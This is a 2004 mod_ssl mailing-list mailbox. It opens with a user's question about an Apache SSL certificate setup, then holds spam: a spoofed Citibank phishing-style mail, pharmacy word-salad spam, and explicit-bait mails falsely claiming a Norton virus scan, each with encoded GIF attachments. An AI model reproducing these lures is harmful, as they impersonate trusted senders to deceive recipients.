#   Server Certificate:
#   Point SSLCertificateFile at a PEM encoded certificate.  If
#   the certificate is encrypted, then you will be prompted for a
#   pass phrase.  Note that a kill -HUP will prompt again. A test
#   certificate can be generated with `make certificate' under
#   built time. Keep in mind that if you've both a RSA and a DSA
#   certificate you can configure both in parallel (to also allow
#   the use of DSA ciphers, etc.)
SSLCertificateFile /etc/httpd/conf/certs/server.crt

#   Server Private Key:
#   If the key is not combined with the certificate, use this
#   directive to point at the key file.  Keep in mind that if
#   you've both a RSA and a DSA private key you can configure
#   both in parallel (to also allow the use of DSA ciphers, etc.)
SSLCertificateKeyFile /etc/httpd/conf/certs/server.key

SSLCACertificateFile /etc/httpd/conf/certs/ca.crt



Here's the information about my certificate:


[shrimp: /etc/httpd/conf/certs] root $ openssl x509 -noout -text -in
server.crt
Certificate:
    Data:
        Version: 1 (0x0)
        Serial Number: 1 (0x1)
        Signature Algorithm: md5WithRSAEncryption
        Issuer: C=US, ST=California, L=Sunnyvale, CN=Erik 
Lotspeich/emailAddress=erik@lotspeich.org
        Validity
            Not Before: Jun  3 15:49:51 2004 GMT
            Not After : Jun  3 15:49:51 2005 GMT
        Subject: C=US, ST=California, L=Sunnyvale, 
CN=www.lotspeich.org/emailAddress=erik@     
lotspeich.org
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (1024 bit)
                Modulus (1024 bit):
                    00:da:c6:4a:02:23:38:c0:ba:44:00:20:30:47:bf:
                    22:54:20:77:0d:a0:b7:e5:66:9b:51:04:5a:94:92:
                    a2:dc:ed:01:b5:15:ab:7f:ca:37:f7:34:97:97:41:
                    08:3b:fa:3c:d4:71:c7:01:3b:1c:03:a5:4c:e6:4e:
                    15:42:b9:cd:cd:9c:5c:6d:75:b7:42:0c:11:3c:39:
                    94:b3:2a:ac:40:45:c6:c3:2b:f2:e1:4f:5c:5c:fa:
                    e1:5e:4b:12:1a:59:cb:0f:36:ea:57:78:8a:ec:4e:
                    46:03:19:0b:29:71:7d:fb:f8:97:92:9c:e3:a0:fa:
                    69:05:02:24:a7:32:77:77:a9
                Exponent: 65537 (0x10001)
    Signature Algorithm: md5WithRSAEncryption
        3b:a1:ae:b7:ac:75:8d:54:68:2e:25:03:30:af:db:26:82:33:
        4c:1e:89:fb:cd:03:5f:c3:0e:0d:87:c4:c9:88:57:3a:16:b6:
        af:19:d9:8d:2d:89:c9:c5:40:b9:72:f3:63:44:a4:bf:10:29:
        90:0b:c7:78:44:c6:73:30:b2:67:49:3b:79:a1:05:50:27:7c:


I tried to follow all of the documentation for making my own CA, CSR, and 
signing my certificate.  I used the following commands in this order:

/usr/local/ssl/misc/CA.sh -newca
openssl genrsa server.key 1024
openssl req -new -key server.key -out server.csr
cp demoCA/cacert.pem ca.crt
cp demoCA/cakey.pem ca.key
/usr/src/compile/mod_ssl-2.8.18-1.3.31/pkg.contrib/sign.sh server.csr

Am I missing something simple here?  Any help would be greatly 
appreciated.  My Apache server's version string is this:

Apache/1.3.27 (Unix) PHP/4.3.4 mod_ssl/2.8.11 OpenSSL/0.9.6g mod_perl/1.27

I'm creating the certificates with OpenSSL 0.9.7d.

Thanks in advance,

Erik.

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From users-billing5@citibank.com  Wed Jun  9 02:21:59 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from cabo-143-239.hotlink.com.br (cabo-143-239.hotlink.com.br [200.165.143.239])
	by master.modssl.org (Postfix) with SMTP id 80D4AA8A6F
	for ; Wed,  9 Jun 2004 02:21:39 +0200 (CEST)
X-Mozilla-Status: 0001
X-Mozilla-Status2: 00000000
FCC: mailbox://users-billing5@citibank.com/Sent
X-Identity-Key: id1
Date: Tue, 08 Jun 2004 20:20:07 -0500
From: Citibank 
X-Mozilla-Draft-Info: internal/draft; vcard=0; receipt=0; uuencode=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.4) Gecko/20030624 Netscape/7.1 (ax)
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users-l@master.modssl.org
Subject: !Citibank updates [Wed, 09 Jun 2004 05:20:07 +0400]
Content-Type: multipart/related;
 boundary="------------090302000502000006090009"
Message-Id: <20040609002139.80D4AA8A6F@master.modssl.org>

This is a multi-part message in MIME format.
--------------090302000502000006090009
Content-Type: text/html; charset=us-ascii
Content-Transfer-Encoding: 7bit


Lyrics The thing is Family into account in 1991 


--------------090302000502000006090009
Content-Type: image/gif;
 name="structural.GIF"
Content-Transfer-Encoding: base64
Content-ID: 
Content-Disposition: inline;
 filename="structural.GIF"

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

--------------090302000502000006090009--


From jkttnhhwwk@blackhills.com  Fri Jun 11 12:11:32 2004
Return-Path: 
X-Original-To: modssl-users-l@master.modssl.org
Delivered-To: modssl-users-l@master.modssl.org
Received: from p6066-ipad03imazuka.yamagata.ocn.ne.jp (p6066-ipad03imazuka.yamagata.ocn.ne.jp [221.185.233.66])
	by master.modssl.org (Postfix) with SMTP id 3D53DA8A51
	for ; Fri, 11 Jun 2004 12:11:13 +0200 (CEST)
Received: from 64.228.101.96 by 221.185.233.66; Fri, 11 Jun 2004 13:01:20 +0200
Message-ID: 
From: "Elwood Goldsmith" 
Reply-To: "Elwood Goldsmith" 
To: modssl-users-l@master.modssl.org
Subject: Please pick up your prescription 
Date: Fri, 11 Jun 2004 05:06:20 -0600
X-Mailer: The Bat! (v1.52f) Business
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--89999094478685738"
X-Priority: 3
X-MSMail-Priority: Normal

----89999094478685738
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable









Nbasel admissible bundoora linotype saponify weasel praecox tycoon eve=
ntide facade diagrammatic reredos daybreak basis stirrup clubroom studio t=
aut vow imprecision=20,Petiquette jealousy press cud marriott protagonist =
withhold ligament tutelage claustrophobia bacterial crisis imperturbable v=
enturesome medic=20.Pflautist ship creon quake reversible ditzel nathan ac=
cordant echidna perish banquet caldwell angela=20.Ccursor deuce prevent da=
mnation chrysanthemum crossway gryphon illustrate corpsmen chilblain atchi=
son bellamy rabbet invent lectern dredge diagnostic mcclellan=20.Emiami pa=
lermo amsterdam sword emissivity hemingway manservant rydberg impetus deba=
uchery burden steepen audible prorogue mile mason temptation subsidiary di=
stal=20.Zadult flak besiege derive euphorbia inestimable pollard skinny be=
rwick downspout lancashire toll wok aversion compatriot=20.Gprecipitous il=
literacy crook adenoma solid bureau astute=20.Dcheney hydroxide gagging me=
tallurgic dare broglie bernard statesman=20!



----89999094478685738--


From owner-modssl-users@modssl.org  Mon Jun 14 03:29:15 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 06EA7A8959; Mon, 14 Jun 2004 03:29:14 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (dial223-203.awalnet.net [212.93.223.203])
	by master.modssl.org (Postfix) with SMTP id 9C62DA8945
	for ; Mon, 14 Jun 2004 03:29:10 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: very hot XXX
Date: 14 Jun 2004 04:28:59 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040614012910.9C62DA8945@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Video's Girls Erotic WebCam's Tits Mpeg's Girls Ass SEX Pussy Video Clips
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
3t3d3dvb29ra2tnZ2djY2NfX19XV1dTU1NHR0c/Pz87Ozs3NzcnJycfHx8XFxcLCwsDAwL+/v7y8
vLu7u7a2tq+vr66urq2traioqKenp6ampqSkpKOjo5+fn56enpeXl5aWlpGRkY+Pj46Ojo2NjYiI
iIeHh4WFhYCAgH9/f3p6enR0dG9vb25ubmpqamdnZ19fX1lZWU9PT01NTUVFRURERENDQ0JCQkFB
QUBAQD8/Pz4+Pjw8PDk5OTMzMzIyMjAwMC8vLy4uLi0tLSsrKygoKCcnJyIiIiEhIR8fHx4eHhoa
GhgYGBUVFRQUFBMTExISEhAQEA8PDw0NDQwMDAoKCgkJCQYGBgEBAQAAAP///wAAAAAAAAAAACH5
BAEAAHwALAAAAACQADgAAAf/gBGCg4SFhoeIiYqLjI2Oj5CRkpOUlZaXmIZJdkIRMXZJi0RomaWm
p5JLe24aM3tLEiMsKhoRLCYsJCxieywdFSgsLCgVFywewhioy8yUqq8vrytlY3ZME3tsbVVheHtg
QTpyZmZyOK5abHtDzYoZRDOEGT/xg/P1hCBL7YqqXXc8XmHZgyKLnhB74gDp0eHLHhEZ3tBx0QKO
Ghl7wuTY84XfoRt76OwZM4iLkyVcMggyiVLloDF7PCJS5WMPmVd3zERAsqfGHiuDtMQ8sSeKICt7
bOw5EmHPFpmFqKyI4GRPvCV0VK6REgGrVq6CsMaEWkgVDCh7cOrkScPpoC0x/0cUPZr0VdOnZAXV
y7CHSAQ6VAQ5ofM3MFXCEVaMUZWXkKoZH+q8urLnw8AUbgV52aNCxZ05KEq8uYNxX+bGgkBOtds1
JmvGGdasYIy6dTwlr2KkKbOniYXTT/acmeIjz5kzeXy4Mo23NpV9TaEzfh3TiV/aqDmwuBBBAwsO
FEwYmaEy16ANO4qUqKCiSBEVxb7bIlE7MUlB1KOH3XODzhKUr4BQH1kICECAA5A4QIAACDCywhou
RbCVIFKsISFYFf7AxYZr7MHFVAN6pEAAJAoAiQAkBqCAIg9OBYITXUEo4T5LyLgGdPuF6ECKJEJw
yQMKNDjIATzumGIDhDRQJP+PCSQCgkhp7cFVBmOMQQUXglBpJZaOjVXfiDwyYAkBJBZACJgBmIgi
iU0OkkCKaqa4IiIZzGCnnQJGkMENIGbJpyEg4FNbATwGIOQkRgZgJiEIBHBgBAakeAAhRJJoQAQO
DMBgiFClOACJA1SiZJmKoEkAIWSSOCenZI0awJskPkDIAgkksIAgDCBQQAEK+BgBrZUGMECtTT5A
7K0P8EgIj7LSWqusERhbawQMGFDArcS2KYizCUAbrQIH7IrAAt6i1iiJid46CKFpMvApjwLIym6h
jkbg6qLvBoCkvZ4KMu++rgZrprLrHrktvYpGoGwAUKU6MImTFoxwig3OW6j/mfcKEuycaEb8ryCu
8vgwiYR8HLLIgjCcokwQUBwBuyZKnOKuaybsQAOmNtCArBn/KqnGKar7Mb/0jsywzEgGO2wCBQiw
qMoKy8RA0BHAGgCC/lIMrasxE53wID0nS+KpEaQaALRDuzoAAxA0gCDBWZOI5NCClJtXsAhOrSrS
YMPdM8gzD5JvymPz7fWig8D9ssHzFoB1iINHm+Klcevb98qAk3r51xGce7Wrh6Yd+LKYV46k52P3
Wp/YnEe+uNybH314kqNTG/QCKYppeuacE04y3xDU7OnjeaE5wK5NG/y65bzL/vfsgrTMptW+Lg9w
7b7Lbn3dFheOWqQTkygk/90hb4449II4zC7Zu6OffcnK151AvlejJjzCZJPvN/bPn0tAqtranvsU
VjoBEgICdINKopZGLB75SH+lUxsE2tY2/tFrX+17HgFJJKYHoA5JDVgA1iBgNgxCxWqUG4TZxATB
33mNRzrD3gYLKEANmm1iSLIa/c7WmHkFMALBmlQLZRe8C2rQYueroQytBi+DMZFHEcsLDAthPAOW
bxALuN/NlsikQohOc4QAH6gWgDvYlbFQCKgeqzLRNluZkCwOYIAC3liIm7lRjWvMox73yMc+IgIA
gAykIAdJyEIa8pCITKQiF8nIRjqSkIIAgB8nyQxJRsCSlMxkJiyJSU16kv8SnIwkJgEJyk5agpT8
QGVeSBnKS6JSlah5pSklAUtD1HIQt1RELm0pyVYGUpQDkuUldgnMQxDTmLNE5iUjKUpWjvKXhRCm
M3vJyWrO8peDbGYznynLawpym9p0pSq/KU5wbrOXzBQnNYtZS2mu05XAdGY0rQlPYcKTEPKcZzyr
eU937pOd72RlOqfJz3viE5r5tGcuFRrQbKrznQfd5ze7iU1TUjSh6FxmPxnKS39uFJfeBOhHI1rP
kJZUnwYtJkhVKlJf0nOkKD1pSdfZzoJi9J8yJelNOerRnma0oAYlJy9XOk5yQlOfHlUnSBHqTaYW
1ZxKBWhRsZnOT1o1Eq0jvKpWG5HVrXr1j+d8pFjHStaympWsX02rWtfK1ra69a2WCAQAOw==



----NextMimePart--

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Jun 15 03:11:38 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id C50E7A8A4D; Tue, 15 Jun 2004 03:11:38 +0200 (CEST)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from 195.27.176.156 (dial223-172.awalnet.net [212.93.223.172])
	by master.modssl.org (Postfix) with SMTP id 03B49A8933
	for ; Tue, 15 Jun 2004 03:11:35 +0200 (CEST)
From: "rse" 
To: modssl-users@modssl.org
Subject: Video Clip
Date: 15 Jun 2004 04:11:23 +0000
MIME-Version: 1.0
X-Mailer: OstroSoft SMTP Component (5.1.1)
Content-Type: multipart/mixed; boundary="--NextMimePart"
Message-Id: <20040615011135.03B49A8933@master.modssl.org>
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "rse" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----NextMimePart
Content-Type: multipart/alternative; boundary="--NextMimePartHTML"

----NextMimePartHTML
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit


----NextMimePartHTML
Content-Type: text/html; charset="us-ascii"
Content-Transfer-Encoding: quoted-printable


Here is another Vclip of my daily group :|
 
 
Engelschall.com servers automatically scanned for viruses using Norton AntiVirus-2004


----NextMimePartHTML--


----NextMimePart
Content-Type: image/gif; Name = "Nav2004.gif"
Content-Transfer-Encoding: Base64
Content-Disposition: attachment; FileName = "Nav2004.gif"

R0lGODlhkAA4AOYAAACAAP8AAP8PD/8fH/8vL/8/P/9PT/9fX/9vb/9/f/+Pj/+fn/+vr/+/v//P
z//f3//v7/////7+/vz8/Pv7+/j4+Pf39/Pz8/Hx8e/v7+7u7ufn5+bm5uXl5eLi4uHh4d/f397e
